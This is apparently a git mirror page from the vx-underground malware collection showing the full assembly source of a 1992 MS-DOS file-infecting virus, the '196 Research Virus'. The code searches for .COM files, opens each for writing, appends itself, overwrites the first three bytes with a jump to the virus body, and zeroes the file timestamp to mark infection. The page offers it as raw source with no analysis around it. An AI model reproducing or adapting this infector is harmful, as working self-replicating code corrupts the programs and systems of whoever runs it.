Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
Code Releases Activity
206bedd3f3
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.189.asm
vxunderground 039994e413
Add files via upload
2021-01-12 17:29:01 -06:00

152 lines
6.5 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;***************************************************************************
;* *
;* 196 - Research Virus Version 1.01 Date. 11th April 1992. *
;* *
;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) *
;* *
;* Non-Overwriting Version of 97 Virus *
;* *
;***************************************************************************
CODE Segment
Assume CS:CODE
progr equ 100h
org progr
virus_size EQU vir_end-vir_start
variable_diff EQU variables_start-next_byte
highlander:
call vir_start ;call virus
mov ah,4ch ;return to operating system
int 21h ;thru' dos interrupt 21h
vir_start:
call next_byte ;call next address
next_byte:
pop ax ;get virus address
pop di ;get program start address
push ax ;save virus address
pop si ;get address of next_byte
mov ax,variable_diff ;add difference
add si,ax ;get variables address
mov ax,3 ;move to old address
sub di,ax ;start of .com file
add si,ax ;point to old code
mov ax,[si] ;get two bytes from old code
mov [di],ax ;and place at start of file
inc si ;increment to third byte
inc si ;
inc di ;increment to third address to save
inc di ;
mov al,[si] ;get last byte of old code
mov [di],al ;and place at start of .COM file
mov ax,5 ;five bytes out
sub si,ax ;back to start of variables
mov di,si ;which is copied to destination
mov ax,6 ;add 6 to variables address
add di,ax ;and save file control block
;search for first
mov ah,4eh ;search for first
xor cx,cx ;attributes to search
mov dx,di ;point to fcb
int 21h ;call dos
jc return_to_prog ;if no file found return to program
found_one:
mov ah,2fh ;get DTA address into es:bx
int 21h ;call dos
mov ax,22 ;jump over to time
add bx,ax ;and point to it
mov al,es:[bx] ;and place in ax
and al,00000111b ;get seconds only
cmp al,00h ;zero seconds?
jnz infect_program ;if not infect program
mov ah,4fh ;find next file
int 21h ;call dos
jmp short found_one ;jump back
infect_program:
mov ax,8 ;jump to asciiz fcb
add ax,bx ;add to bx
mov dx,ax ;and move to dx
mov ax,3d02h ;open file for writing
int 21h ;call dos
jnc continue ;continue if no error
mov ah,4fh ;search for next
xor cx,cx ;attributes to search
int 21h ;call dos
jc return_to_prog ;if no file found return to program
jmp short found_one ;jump forward if one found
continue:
mov bx,ax ;transfer file handle to bx
;read first three bytes
mov ah,3fh ;read file
mov cx,3 ;number of bytes to read
mov dx,3 ;three bytes to old_code
add dx,si ;point to buffer to read
int 21h ;call dos
mov ax,4202h ;move file pointer to end of file
xor cx,cx ;clear cx
xor dx,dx ;clear dx
int 21h ;call dos
dec ax ;decrement ax
dec ax ;
dec ax ;
dec si ;save address
mov word [si],ax ;and store
mov ah,40h ;write to file
mov cx,virus_size ;set counter to write
mov dx,offset vir_start ;point to buffer to start
int 21h ;and write to file
mov ax,4200h ;move file pointer to start of file
xor cx,cx ;clear cx
xor dx,dx ;clear dx
int 21h ;call dos
mov ah,40h ;write to file
mov cx,3 ;set counter to write
inc si ;point to jump address
mov dx,si ;point to buffer to start
int 21h ;and write to file
mov ax,5701h ;set date & time
xor cx,cx ;time set to zero
xor dx,dx ;and date
int 21h ;and do it
mov ah,3eh ;close file
int 21h ;thru' dos
return_to_prog:
mov ah,4ch ;terminate program
int 21h ;exit to dos
variables_start:
jump_add:
db 0e8h,0,0
old_code:
db 90h,90h,90h
fcb:
db "*.COM",0
variables_end:
vir_end:
CODE ENDS
END highlander

View Git Blame Copy Permalink